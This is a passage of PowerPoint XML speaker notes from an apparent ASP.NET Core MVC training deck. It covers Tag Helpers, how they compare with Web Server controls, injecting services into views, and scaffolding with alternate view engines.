              <a:t>@tagHelperPrefix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to make Tag Helper usage explicit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@tagHelperPrefix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directive allows you to specify a tag prefix string to enable Tag Helper support and to make Tag Helper usage explicit. In the code image in the slide section, the Tag Helper prefix is set to “th:”, so only those elements using the prefix “th:” support Tag Helpers (Tag Helper-enabled elements have a distinctive font). The &lt;label&gt; and &lt;span&gt; elements have the Tag Helper prefix and are Tag Helper-enabled, while the &lt;input&gt; element does not.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343029578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b="1" dirty="0"/>
              <a:t>For more information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, see: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>https://github.com/aspnet/Mvc/tree/dev/src/Microsoft.AspNetCore.Mvc.TagHelpers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235526302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pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413317650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pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134119571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pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31996692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9DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369389621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9DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23720971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9DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237715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9DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382355450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9DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2265173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pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120708596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9DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390586769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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag Helpers do not own the element they are associated with; they simply participate in the rendering of the element and content. ASP.NET Web Server controls are declared and invoked on a page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server controls have a non-trivial lifecycle that can make developing and debugging difficult.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server controls allow you to add functionality to the client Document Object Model (DOM) elements by using a client control. Tag Helpers have no DOM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server controls include automatic browser detection. Tag Helpers have no knowledge of the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple Tag Helpers can act on the same element (see Avoiding Tag Helper conflicts) while you typically cannot compose Web Server controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag Helpers can modify the tag and content of the HTML elements that they are scoped to, but do not directly modify anything else on a page. Web Server controls have a less specific scope and can perform actions that affect other parts of your page; enabling unintended side effects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server controls use type converters to convert strings into objects. With Tag Helpers, you work natively in C#, so you do not need to do type conversion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server controls use System.ComponentModel to implement the run-time and design-time behavior of components and controls. System.ComponentModel includes the base classes and interfaces for implementing attributes and type converters, binding to data sources, and licensing components. Contrast to Tag Helpers, which typically derive from TagHelper, and the TagHelper base class exposes only two methods, Process and ProcessAsync.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213858037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b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Tag Helpers used in any application or ASP.NET Core starter template project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>IntelliSense support for Tag Helpers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag helpers vs. HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> helpers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Tag helpers vs. web server controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/aspnet/core/mvc/views/tag-helpers/intro?view=aspnetcore-3.1#managing-tag-helper-scope</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> script on the next slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146571724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791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379603352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dirty="0"/>
              <a:t>It’s looks like violation of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> MVC concepts, when we are calling some service from View layer… yet, it is officially recommended way of doing it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Nothing stopped before developer from calling DB from View except of best practices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>But if w are using Service Injection, we can not violate MVC patterns in some cases. For example- Localization. Localization is UI translation and it’s not part of your Business Logic. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Localization/ Globalization – it’s the best example of Service Injection that will not violate MVC pattern.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1489DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366164950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pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51949032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b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> how a service is injected into a view.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>When does it make sense to do service injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/aspnet/core/mvc/views/dependency-injection?view=aspnetcore-3.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo script on the next slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140785445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b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://stackoverflow.com/questions/56042058/is-it-possible-to-change-cshtml-view-and-see-the-changes-instantly-using-net-c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140785445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3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{675416BA-65F7-274A-AD61-D0FA78F3AA6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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a:xfrm>
            <a:off x="384048" y="3913632"/>
            <a:ext cx="6099048" cy="4773168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Section Overview:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This section discusses the following topics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scaffolding Templates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn T4 Text Templates (TTT) fundamentals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enterprise application for TTT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33138282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pPr/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1588944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dirty="0"/>
              <a:t>Views can be created through right-clicking in Solution Explorer and then clicking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Add View</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Right-click an Action Method, and select Add View from Context menu to create a view for a particular action method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eight alternate view engines:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NDjango</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NHaml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NVelocity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SharpTiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>StringTemplate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSLT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Image Placeholder 7"/>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332078735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791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366640494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pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336086783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89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>83</a:t>
